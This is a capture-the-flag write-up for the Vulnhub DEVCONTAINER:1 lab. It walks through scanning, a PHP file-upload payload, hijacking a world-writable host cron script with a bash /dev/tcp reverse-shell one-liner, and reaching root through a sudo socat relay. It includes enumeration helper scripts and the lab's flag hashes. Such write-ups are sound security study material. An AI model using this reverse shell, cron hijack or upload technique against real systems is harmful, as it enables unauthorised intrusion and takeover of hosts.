Vulnhub:DEVCONTAINER: 1

Contents

Information gathering

arp

nmap

nikto

whatweb

Web

Information gathering

dirmap

File upload

Privilege escalation

System enumeration

Horizontal privilege escalation

Information disclosure

get root


Information gathering

arp
┌──(root㉿ru)-[~/kali/vulnhub]
└─# arp-scan -l               
Interface: eth0, type: EN10MB, MAC: 00:50:56:2f:dd:99, IPv4: 192.168.211.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.211.1  00:50:56:c0:00:08  VMware, Inc.
192.168.211.2  00:50:56:e6:61:4b  VMware, Inc.
192.168.211.135  00:50:56:21:cf:ed  VMware, Inc.
192.168.211.254  00:50:56:f0:b5:b8  VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.495 seconds (102.61 hosts/sec). 4 responded

nmap
Port scan
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nmap -p- 192.168.211.135 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 13:59 CST
Nmap scan report for 192.168.211.135
Host is up (0.0036s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:50:56:21:CF:ED (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds

Service and version detection
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nmap -sC -sV -O -p 80 192.168.211.135 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 14:00 CST
Nmap scan report for 192.168.211.135
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Freelancer - Start Bootstrap Theme
MAC Address: 00:50:56:21:CF:ED (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.22 seconds

nikto
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nikto -h http://192.168.211.135/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.211.135
+ Target Hostname:    192.168.211.135
+ Target Port:        80
+ Start Time:         2024-04-08 15:47:27 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 6a7f, size: 5af24a0184072, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2024-04-08 15:47:53 (GMT8) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

whatweb
┌──(root㉿ru)-[~/kali/vulnhub]
└─# whatweb -v http://192.168.211.135/            
WhatWeb report for http://192.168.211.135/
Status    : 200 OK
Title     : Freelancer - Start Bootstrap Theme
IP        : 192.168.211.135
Country   : RESERVED, ZZ

Summary   : Apache[2.4.38], Bootstrap, HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], JQuery, Script, X-UA-Compatible[IE=edge]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.38 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with
        HTML, CSS, and JS.

        Website     : https://getbootstrap.com/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Debian Linux
        String       : Apache/2.4.38 (Debian) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse
        HTML documents, handle events, perform animations, and add
        AJAX.

        Website     : http://jquery.com/

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.

[ X-UA-Compatible ]
        This plugin retrieves the X-UA-Compatible value from the
        HTTP header and meta http-equiv tag. - More Info:
        http://msdn.microsoft.com/en-us/library/cc817574.aspx

        String       : IE=edge

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Mon, 08 Apr 2024 07:33:10 GMT
        Server: Apache/2.4.38 (Debian)
        Last-Modified: Sat, 12 Sep 2020 21:38:43 GMT
        ETag: "6a7f-5af24a0184072-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 3377
        Connection: close
        Content-Type: text/html

Web

Information gathering


dirmap
┌──(root㉿ru)-[~/tools/dirscan/dirmap]
└─# python3 dirmap.py -i http://192.168.211.135/ -lcf
[dirmap v1.0 banner]
[*] Initialize targets...
[+] Load targets from: http://192.168.211.135/
[+] Set the number of thread: 30
[+] Coroutine mode
[+] Current target: http://192.168.211.135/                                                                    
[*] Launching auto check 404
[+] Checking with: http://192.168.211.135/ccjimqtouvulxwpfqmepgsutmqaakqkggbqjpmlnko
[*] Use recursive scan: No                                                                                     
[*] Use dict mode
[+] Load dict:/root/tools/dirscan/dirmap/data/dict_mode_dict.txt
[*] Use crawl mode
[200][text/html][3.30kb] http://192.168.211.135/index.html                                                     
[200][text/markdown][278.00b] http://192.168.211.135/readme.md                                                 
[200][text/html][588.00b] http://192.168.211.135/upload/                                                       
[200][text/html; charset=UTF-8][500.00b] http://192.168.211.135/upload/upload.php                              
[200][text/html][3.30kb] http://192.168.211.135/                                                               
[200][application/javascript][906.00b] http://192.168.211.135/js/contact_me.js                                 
[200][image/png][18.79kb] http://192.168.211.135/img/portfolio/safe.png                                        
[200][image/png][10.04kb] http://192.168.211.135/img/profile.png                                               
[200][text/css][4.92kb] http://192.168.211.135/font-awesome/css/font-awesome.min.css                           
[200][application/javascript][32.45kb] http://192.168.211.135/js/jquery.js                                     
[200][image/png][23.76kb] http://192.168.211.135/img/portfolio/submarine.png                                   
[200][application/javascript][680.00b] http://192.168.211.135/js/classie.js                                    
[200][image/png][27.33kb] http://192.168.211.135/img/portfolio/circus.png                                      
[200][text/css][1.82kb] http://192.168.211.135/css/freelancer.css                                              
[200][image/png][16.67kb] http://192.168.211.135/img/portfolio/cake.png                                        
[200][image/png][25.29kb] http://192.168.211.135/img/portfolio/game.png                                        
[200][application/javascript][622.00b] http://192.168.211.135/js/freelancer.js                                 
[200][text/css][18.91kb] http://192.168.211.135/css/bootstrap.min.css                                          
[200][image/png][35.66kb] http://192.168.211.135/img/portfolio/cabin.png                                       
[200][application/javascript][9.19kb] http://192.168.211.135/js/bootstrap.min.js
99% (6600 of 6618) |################################################### | Elapsed Time: 0:00:13 ETA:   0:00:00


So it comes down to the file upload at /upload/upload.php.

File upload

The upload succeeds, but the response does not say where the file was stored, so we enumerate the upload directory again:
┌──(root㉿ru)-[~/kali/vulnhub]
└─# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -u http://192.168.211.135/upload/FUZZ -t 100 --hc 404,403
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.211.135/upload/FUZZ
Total requests: 17770

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000055:   301        9 L      28 W       325 Ch      "files"
000003809:   200        31 L     85 W       903 Ch      "http://192.168.211.135/upload/"

Fuzzing reveals the files directory, so uploads land in /upload/files/. With a listener waiting, triggering the uploaded payload from there calls back:

┌──(root㉿ru)-[~/kali/vulnhub]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.211.135: inverse host lookup failed: Unknown host
connect to [192.168.211.128] from (UNKNOWN) [192.168.211.135] 60876
Linux 32064e9210cb 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
 08:09:12 up 22 min,  0 users,  load average: 0.01, 0.87, 0.85
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

Privilege escalation

System enumeration
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/bin/mount
/bin/umount
/bin/su
$ ls -al /var/www/html
total 88
drwxr-xr-x 11 root root  4096 Sep 12  2020 .
drwxr-xr-x  1 root root  4096 Sep 10  2020 ..
drwxrwxrwx  2 root 1000  4096 Apr  8  2024 Maintenance-Web-Docker
drwxr-xr-x  2 root root  4096 Sep 12  2020 css
drwxr-xr-x  6 root root  4096 Sep 12  2020 font-awesome
drwxr-xr-x  2 root root  4096 Sep 12  2020 fonts
drwxr-xr-x  3 root root  4096 Sep 12  2020 img
-rw-r--r--  1 root root 27263 Sep 12  2020 index.html
drwxr-xr-x  2 root root  4096 Sep 12  2020 js
drwxr-xr-x  2 root root  4096 Sep 12  2020 less
-rw-r--r--  1 root root 11336 Sep 12  2020 license
drwxr-xr-x  2 root root  4096 Sep 12  2020 mail
-rw-r--r--  1 root root   278 Sep 12  2020 readme.md
drwxr-xr-x  3 root root  4096 Sep 12  2020 upload
$ ls -al
total 24
drwxrwxrwx  2 root 1000 4096 Apr  8  2024 .
drwxr-xr-x 11 root root 4096 Sep 12  2020 ..
-rwxrwxrwx  1 root root  164 Sep 13  2020 list.sh
-rwxr-xr-x  1 root root  204 Sep 12  2020 maintenance.sh
-rw-r--r--  1 1000 1000 5066 Apr  8 08:42 out.txt
$ cat list.sh
#!/bin/bash
date >> /home/richard/web/Maintenance-Web-Docker/out.txt
ls /home/richard/web/upload/files/ | wc -l >> /home/richard/web/Maintenance-Web-Docker/out.txt
$ date
Mon Apr  8 08:43:20 UTC 2024

list.sh appends the current date to /home/richard/web/Maintenance-Web-Docker/out.txt, then counts the files in /home/richard/web/upload/files/ and appends that number to the same file. Those are host paths, yet the same tree (Maintenance-Web-Docker, upload) sits under /var/www/html in this shell, and the hostname from the callback (32064e9210cb) is a Docker container id. The likely picture is that /home/richard/web on the host is bind-mounted into the container as /var/www/html, and a scheduled job on the host runs list.sh as uid 1000: out.txt is owned by 1000 and was written at 08:42, one minute before our date command. list.sh is world-readable, writable and executable, so whatever we put in it runs as that host user on the next tick. Let's use it.
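Before touching list.sh it is worth confirming the picture above from inside the www-data shell. The script below is an added example of those checks, not part of the original writeup: it looks for container indicators, lists bind mounts (the mount point and the path on the backing filesystem), and reports world-writable and recently written files in a directory. Every function defaults to the live file but accepts a path to a copy, so it can be exercised on constructed input; the cgroup and mountinfo formats are assumed to be the usual Linux ones.

```shell
#!/bin/bash
# Added example (not from the original writeup): checks to run from the
# www-data shell to explain why a world-writable list.sh matters here.
# File/dir arguments default to the live system but accept copies.

# Is this shell inside a container?  Docker drops /.dockerenv in the root and
# usually puts "docker" (or a 64-hex container id) in the cgroup paths of PID 1.
in_container() {
    local cgroup="${1:-/proc/1/cgroup}" dockerenv="${2:-/.dockerenv}"
    [ -e "$dockerenv" ] && return 0
    grep -Eq 'docker|containerd|kubepods|/[0-9a-f]{64}' "$cgroup" 2>/dev/null
}

# Bind mounts from /proc/self/mountinfo.  Field 4 is the path inside the
# backing filesystem, field 5 the mount point; a root other than "/" means the
# mount point is a sub-tree of some host filesystem (for a host partition
# mounted at /, that is the host path, e.g. /home/richard/web -> /var/www/html).
bind_mounts() {
    local mountinfo="${1:-/proc/self/mountinfo}"
    awk '$4 != "/" { printf "%s <- %s\n", $5, $4 }' "$mountinfo"
}

# World-writable regular files directly under DIR: a script here that
# something outside the container executes is code execution on the host.
writable_scripts() {
    find "$1" -maxdepth 1 -type f -perm -o+w 2>/dev/null | sort
}

# Files under DIR modified in the last MINUTES minutes, with numeric owner uid
# and mtime.  A fresh out.txt owned by uid 1000 while we are uid 33 shows that
# another principal runs a job here, and roughly how often.
recent_writes() {
    local dir="$1" minutes="${2:-5}"
    find "$dir" -maxdepth 1 -type f -mmin "-$minutes" \
        -printf '%U %TH:%TM %p\n' 2>/dev/null | sort
}

# Live run, e.g.:  bash recon.sh /var/www/html/Maintenance-Web-Docker
if [ $# -ge 1 ]; then
    in_container && echo "[*] running inside a container (hostname $(hostname))"
    echo "[*] bind mounts:"; bind_mounts
    echo "[*] world-writable files in $1:"; writable_scripts "$1"
    echo "[*] written in the last 5 minutes in $1:"; recent_writes "$1" 5
fi
```

On this box the interesting lines are the bind mount of /var/www/html and out.txt showing up in recent_writes with an owner that is not uid 33; together they say "a host-side job runs in this directory", which is exactly what makes list.sh worth hijacking.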

Horizontal privilege escalation

echo "/bin/bash -c 'bash -i>& /dev/tcp/192.168.211.128/7878 0>&1'" > list.sh

Start a listener on port 7878 and wait for the next run of the job. The callback arrives as richard on the host EC2 rather than inside the container:


richard@EC2:~$ ls
ls
HackTools
user.txt
web
richard@EC2:~$ cat user.txt
cat user.txt
3a6b99f59ea363803bcafc7f5dd9b1e8
richard@EC2:~$ 
richard@EC2:~/HackTools$ sudo -l
sudo -l
Matching Defaults entries for richard on EC2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on EC2:
    (ALL) NOPASSWD: /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90
richard@EC2:~/HackTools$ 
/home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90

Run it with sudo. The sudoers entry pins the full argument list, so the command cannot be turned into something like EXEC:/bin/sh; what it does give us is a root-owned relay: every connection arriving on port 8080 (all interfaces) is forwarded to 127.0.0.1:90, a service that until now was reachable only from the host itself. Since the binary lives under richard's home, it is also worth checking its ownership with ls -l: a NOPASSWD rule that points at a file the user can replace is root without any argument tricks.

Sure enough, a new port is open.
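The "check the file, not just the arguments" point generalises to any sudo -l listing, so here is an added triage script (mine, not the author's) that pulls the executable path out of each allowed command and reports the ones that are missing, owned by the current uid, or world-writable. It assumes GNU sed and stat and a listing saved to a file with sudo -l > file; the uid can be passed explicitly so a saved listing can be triaged offline.

```shell
#!/bin/bash
# Added example, not part of the original writeup: triage a "sudo -l" listing.
# A rule with fixed arguments (like the socat one) cannot be re-pointed at
# EXEC:/bin/sh, but the file sudo executes is still worth checking: if the
# current user owns it, it is world-writable, or it does not exist yet and the
# directory is ours, the rule is root without any argument tricks.
# Assumptions: GNU sed/stat; the listing is in a file (sudo -l > sudo.txt).

# Print the executable path of every command the listing allows.  Lines look
# like "    (ALL) NOPASSWD: /path/bin arg1 arg2"; tag words such as NOPASSWD:
# or SETENV: may precede the path, and "(ALL : ALL) ALL" lines have no path.
sudo_targets() {
    sed -n 's/^ *([^)]*) *\([A-Z]*: *\)*\(\/[^ ]*\).*/\2/p' "$1"
}

# For each target, report MISSING, or WRITABLE when owned by uid ME or when the
# "other" permission digit allows writing.  ME defaults to the current uid.
writable_sudo_targets() {
    local listing="$1" me="${2:-$(id -u)}" path owner mode
    sudo_targets "$listing" | while IFS= read -r path; do
        if [ ! -e "$path" ]; then
            echo "MISSING  $path"
            continue
        fi
        owner=$(stat -c %u "$path"); mode=$(stat -c %a "$path")
        case "$mode" in
            *[2367]) echo "WRITABLE $path (uid $owner, mode $mode)"; continue ;;
        esac
        [ "$owner" = "$me" ] && echo "WRITABLE $path (uid $owner, mode $mode)"
    done
}

# Usage: sudo -l > /tmp/sudo.txt; bash sudotriage.sh /tmp/sudo.txt
if [ $# -ge 1 ]; then
    writable_sudo_targets "$@"
fi
```

A WRITABLE line means the easiest root is to replace that file with a script of your own; a MISSING line under your home directory means the same, since you can create it. Neither replaces reading the arguments, it just makes sure the obvious case is not overlooked.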

Information disclosure

Poking at the relayed service shows that it serves the same web tree, /home/richard/web, and, as the uname and id below confirm, it runs as root on the host EC2. So the payload uploaded earlier, now at /home/richard/web/upload/files/shell.php, only needs to be requested through port 8080 to get a root shell:

get root
┌──(root㉿ru)-[~/tools/dirscan/dirmap]
└─# nc -lvvp 2345
listening on [any] 2345 ...
192.168.211.135: inverse host lookup failed: Unknown host
connect to [192.168.211.128] from (UNKNOWN) [192.168.211.135] 42992
Linux EC2 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
 05:06:55 up 32 min,  0 users,  load average: 6.43, 6.14, 4.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
proof.txt
# cat proof.txt
 _    _      _ _       _                  _ 
| |  | |    | | |     | |                | |
| |  | | ___| | |   __| | ___  _ __   ___| |
| |/\| |/ _ \ | |  / _` |/ _ \| '_ \ / _ \ |
\  /\  /  __/ | | | (_| | (_) | | | |  __/_|
 \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___(_)
07f61ca07bc617f9639b412423b2cc6f
Twitter: @0x04E1
# 
